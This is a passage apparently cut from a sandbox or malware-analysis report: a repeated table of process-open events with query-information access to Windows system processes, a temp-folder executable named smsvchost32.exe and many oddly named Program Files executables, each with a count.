| Open | c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\sihost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
3 | |
| Open | c:\windows\system32\runtimebroker.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
3 | |
| Open | c:\windows\system32\taskhostw.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
3 | |
| Open | c:\windows\explorer.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
3 | |
| Open | c:\program files\windowsapps\microsoft.messaging_1.10.22012.0_x86__8wekyb3d8bbwe\skypehost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
3 | |
| Open | c:\windows\systemapps\shellexperiencehost_cw5n1h2txyewy\shellexperiencehost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
3 | |
| Open | c:\windows\systemapps\microsoft.windows.cortana_cw5n1h2txyewy\searchui.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
3 | |
| Open | c:\windows\system32\dllhost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
3 | |
| Open | c:\program files\windowsapps\microsoft.messaging_1.10.22012.0_x86__8wekyb3d8bbwe\skypehost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
3 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
3 | |
| Open | c:\windows\system32\backgroundtaskhost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
3 | |
| Open | c:\program files\uninstall information\develop-patent.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
3 | |
| Open | c:\program files (x86)\common files\its.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
3 | |
| Open | c:\program files\internet explorer\gently budapest.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
3 | |
| Open | c:\program files (x86)\windows sidebar\thoroughlypriestprefix.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
3 | |
| Open | c:\program files\microsoft analysis services\inserted_field.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
3 | |
| Open | c:\program files (x86)\msbuild\semi bay.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
3 | |
| Open | c:\program files\windows journal\outdoor.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
3 | |
| Open | c:\program files\windows mail\wool-parish-horses.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
3 | |
| Open | c:\program files\mozilla firefox\spoken-delayed.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
3 | |
| Open | c:\program files\microsoft office 15\spokesman.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
3 | |
| Open | c:\program files (x86)\mozilla maintenance service\oxide.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
3 | |
| Open | c:\program files (x86)\windowspowershell\off-covered-playlist.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
3 | |
| Open | c:\program files (x86)\google\bryant.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
3 | |
| Open | c:\program files\uninstall information\postal-fool.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
3 | |
| Open | c:\program files\microsoft office 15\crm_remarks_ctrl.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
3 | |
| Open | c:\program files\common files\volunteer.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
3 | |
| Open | c:\program files (x86)\windowspowershell\ranger_tu_community.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
3 | |
| Open | c:\program files\java\eddie_cholesterol_reprint.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
3 | |
| Open | c:\program files\msbuild\bracket-natural-chancellor.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
3 | |
| Open | c:\program files (x86)\msecache\safari.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
6 | |
| Open | c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
3 | |
| Open | c:\windows\system32\sihost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
3 | |
| Open | c:\windows\system32\runtimebroker.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
3 | |
| Open | c:\windows\system32\taskhostw.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
3 | |
| Open | c:\windows\explorer.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
3 | |
| Open | c:\program files\windowsapps\microsoft.messaging_1.10.22012.0_x86__8wekyb3d8bbwe\skypehost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
3 | |
| Open | c:\windows\systemapps\shellexperiencehost_cw5n1h2txyewy\shellexperiencehost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
3 | |
| Open | c:\windows\systemapps\microsoft.windows.cortana_cw5n1h2txyewy\searchui.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
3 | |
| Open | c:\windows\system32\dllhost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
3 | |
| Open | c:\program files\windowsapps\microsoft.messaging_1.10.22012.0_x86__8wekyb3d8bbwe\skypehost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
3 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
3 | |
| Open | c:\windows\system32\backgroundtaskhost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
3 | |
| Open | c:\program files\uninstall information\develop-patent.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
3 | |
| Open | c:\program files (x86)\common files\its.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
3 | |
| Open | c:\program files\internet explorer\gently budapest.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
3 | |
| Open | c:\program files (x86)\windows sidebar\thoroughlypriestprefix.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
3 | |
| Open | c:\program files\microsoft analysis services\inserted_field.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
3 | |
| Open | c:\program files (x86)\msbuild\semi bay.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
3 | |
| Open | c:\program files\windows journal\outdoor.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
3 | |
| Open | c:\program files\windows mail\wool-parish-horses.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
3 | |
| Open | c:\program files\mozilla firefox\spoken-delayed.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
3 | |
| Open | c:\program files\microsoft office 15\spokesman.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
3 | |
| Open | c:\program files (x86)\mozilla maintenance service\oxide.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
3 | |
| Open | c:\program files (x86)\windowspowershell\off-covered-playlist.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
3 | |
| Open | c:\program files (x86)\google\bryant.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
3 | |
| Open | c:\program files\uninstall information\postal-fool.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
3 | |
| Open | c:\program files\microsoft office 15\crm_remarks_ctrl.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
3 | |
| Open | c:\program files\common files\volunteer.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
3 | |
| Open | c:\program files (x86)\windowspowershell\ranger_tu_community.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
3 | |
| Open | c:\program files\java\eddie_cholesterol_reprint.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
3 | |
| Open | c:\program files\msbuild\bracket-natural-chancellor.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
3 | |
| Open | c:\program files (x86)\msecache\safari.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
6 | |
| Open | c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
3 | |
| Open | c:\windows\system32\sihost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\windows\system32\runtimebroker.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\windows\system32\taskhostw.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\windows\explorer.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\program files\windowsapps\microsoft.messaging_1.10.22012.0_x86__8wekyb3d8bbwe\skypehost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\windows\systemapps\shellexperiencehost_cw5n1h2txyewy\shellexperiencehost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\windows\systemapps\microsoft.windows.cortana_cw5n1h2txyewy\searchui.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\windows\system32\dllhost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\program files\windowsapps\microsoft.messaging_1.10.22012.0_x86__8wekyb3d8bbwe\skypehost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\windows\system32\backgroundtaskhost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\program files\uninstall information\develop-patent.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\program files (x86)\common files\its.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\program files\internet explorer\gently budapest.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\program files (x86)\windows sidebar\thoroughlypriestprefix.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\program files\microsoft analysis services\inserted_field.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\program files (x86)\msbuild\semi bay.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\program files\windows journal\outdoor.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\program files\windows mail\wool-parish-horses.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\program files\mozilla firefox\spoken-delayed.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\program files\microsoft office 15\spokesman.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\program files (x86)\mozilla maintenance service\oxide.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\program files (x86)\windowspowershell\off-covered-playlist.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\program files (x86)\google\bryant.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\program files\uninstall information\postal-fool.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\program files\microsoft office 15\crm_remarks_ctrl.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\program files\common files\volunteer.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\program files (x86)\windowspowershell\ranger_tu_community.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\program files\java\eddie_cholesterol_reprint.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\program files\msbuild\bracket-natural-chancellor.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\program files (x86)\msecache\safari.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
4 | |
| Open | c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\windows\system32\sihost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\runtimebroker.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\taskhostw.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\explorer.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\windowsapps\microsoft.messaging_1.10.22012.0_x86__8wekyb3d8bbwe\skypehost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\systemapps\shellexperiencehost_cw5n1h2txyewy\shellexperiencehost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\systemapps\microsoft.windows.cortana_cw5n1h2txyewy\searchui.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\dllhost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\windowsapps\microsoft.messaging_1.10.22012.0_x86__8wekyb3d8bbwe\skypehost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\backgroundtaskhost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\uninstall information\develop-patent.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\common files\its.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\internet explorer\gently budapest.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\windows sidebar\thoroughlypriestprefix.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\microsoft analysis services\inserted_field.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\msbuild\semi bay.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\windows journal\outdoor.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\windows mail\wool-parish-horses.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\mozilla firefox\spoken-delayed.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\microsoft office 15\spokesman.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\mozilla maintenance service\oxide.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\windowspowershell\off-covered-playlist.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\google\bryant.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\uninstall information\postal-fool.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\microsoft office 15\crm_remarks_ctrl.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\common files\volunteer.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\windowspowershell\ranger_tu_community.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\java\eddie_cholesterol_reprint.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\msbuild\bracket-natural-chancellor.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\msecache\safari.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\sihost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\runtimebroker.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\taskhostw.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\explorer.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\windowsapps\microsoft.messaging_1.10.22012.0_x86__8wekyb3d8bbwe\skypehost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\systemapps\shellexperiencehost_cw5n1h2txyewy\shellexperiencehost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\systemapps\microsoft.windows.cortana_cw5n1h2txyewy\searchui.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\dllhost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\windowsapps\microsoft.messaging_1.10.22012.0_x86__8wekyb3d8bbwe\skypehost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\backgroundtaskhost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\uninstall information\develop-patent.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\common files\its.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\internet explorer\gently budapest.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\windows sidebar\thoroughlypriestprefix.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\microsoft analysis services\inserted_field.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\msbuild\semi bay.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\windows journal\outdoor.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\windows mail\wool-parish-horses.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\mozilla firefox\spoken-delayed.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\microsoft office 15\spokesman.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\mozilla maintenance service\oxide.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\windowspowershell\off-covered-playlist.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\google\bryant.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\uninstall information\postal-fool.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\microsoft office 15\crm_remarks_ctrl.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\common files\volunteer.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\windowspowershell\ranger_tu_community.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\java\eddie_cholesterol_reprint.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\msbuild\bracket-natural-chancellor.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\msecache\safari.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\sihost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\runtimebroker.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\taskhostw.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\explorer.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\windowsapps\microsoft.messaging_1.10.22012.0_x86__8wekyb3d8bbwe\skypehost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\systemapps\shellexperiencehost_cw5n1h2txyewy\shellexperiencehost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\systemapps\microsoft.windows.cortana_cw5n1h2txyewy\searchui.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\dllhost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\windowsapps\microsoft.messaging_1.10.22012.0_x86__8wekyb3d8bbwe\skypehost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\backgroundtaskhost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\uninstall information\develop-patent.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\common files\its.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\internet explorer\gently budapest.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\windows sidebar\thoroughlypriestprefix.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\microsoft analysis services\inserted_field.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\msbuild\semi bay.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\windows journal\outdoor.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\windows mail\wool-parish-horses.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\mozilla firefox\spoken-delayed.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\microsoft office 15\spokesman.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\mozilla maintenance service\oxide.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\windowspowershell\off-covered-playlist.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\google\bryant.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\uninstall information\postal-fool.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\microsoft office 15\crm_remarks_ctrl.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\common files\volunteer.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\windowspowershell\ranger_tu_community.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\java\eddie_cholesterol_reprint.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\msbuild\bracket-natural-chancellor.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\msecache\safari.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\sihost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\runtimebroker.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\taskhostw.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\explorer.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\windowsapps\microsoft.messaging_1.10.22012.0_x86__8wekyb3d8bbwe\skypehost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\systemapps\shellexperiencehost_cw5n1h2txyewy\shellexperiencehost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\systemapps\microsoft.windows.cortana_cw5n1h2txyewy\searchui.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\dllhost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\windowsapps\microsoft.messaging_1.10.22012.0_x86__8wekyb3d8bbwe\skypehost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\backgroundtaskhost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\uninstall information\develop-patent.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\common files\its.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\internet explorer\gently budapest.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\windows sidebar\thoroughlypriestprefix.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\microsoft analysis services\inserted_field.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\msbuild\semi bay.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\windows journal\outdoor.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\windows mail\wool-parish-horses.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\mozilla firefox\spoken-delayed.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\microsoft office 15\spokesman.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\mozilla maintenance service\oxide.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\windowspowershell\off-covered-playlist.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\google\bryant.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\uninstall information\postal-fool.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\microsoft office 15\crm_remarks_ctrl.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\common files\volunteer.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\windowspowershell\ranger_tu_community.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\java\eddie_cholesterol_reprint.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\msbuild\bracket-natural-chancellor.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\msecache\safari.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\sihost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
9 | |
| Open | c:\windows\system32\runtimebroker.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
9 | |
| Open | c:\windows\system32\taskhostw.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
9 | |
| Open | c:\windows\explorer.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
9 | |
| Open | c:\program files\windowsapps\microsoft.messaging_1.10.22012.0_x86__8wekyb3d8bbwe\skypehost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
9 | |
| Open | c:\windows\systemapps\shellexperiencehost_cw5n1h2txyewy\shellexperiencehost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
9 | |
| Open | c:\windows\systemapps\microsoft.windows.cortana_cw5n1h2txyewy\searchui.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
9 | |
| Open | c:\windows\system32\dllhost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
9 | |
| Open | c:\program files\windowsapps\microsoft.messaging_1.10.22012.0_x86__8wekyb3d8bbwe\skypehost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
9 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
9 | |
| Open | c:\windows\system32\backgroundtaskhost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
9 | |
| Open | c:\program files\uninstall information\develop-patent.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
9 | |
| Open | c:\program files (x86)\common files\its.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
9 | |
| Open | c:\program files\internet explorer\gently budapest.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
9 | |
| Open | c:\program files (x86)\windows sidebar\thoroughlypriestprefix.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
9 | |
| Open | c:\program files\microsoft analysis services\inserted_field.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
9 | |
| Open | c:\program files (x86)\msbuild\semi bay.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
9 | |
| Open | c:\program files\windows journal\outdoor.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
9 | |
| Open | c:\program files\windows mail\wool-parish-horses.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
9 | |
| Open | c:\program files\mozilla firefox\spoken-delayed.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
9 | |
| Open | c:\program files\microsoft office 15\spokesman.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
9 | |
| Open | c:\program files (x86)\mozilla maintenance service\oxide.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
9 | |
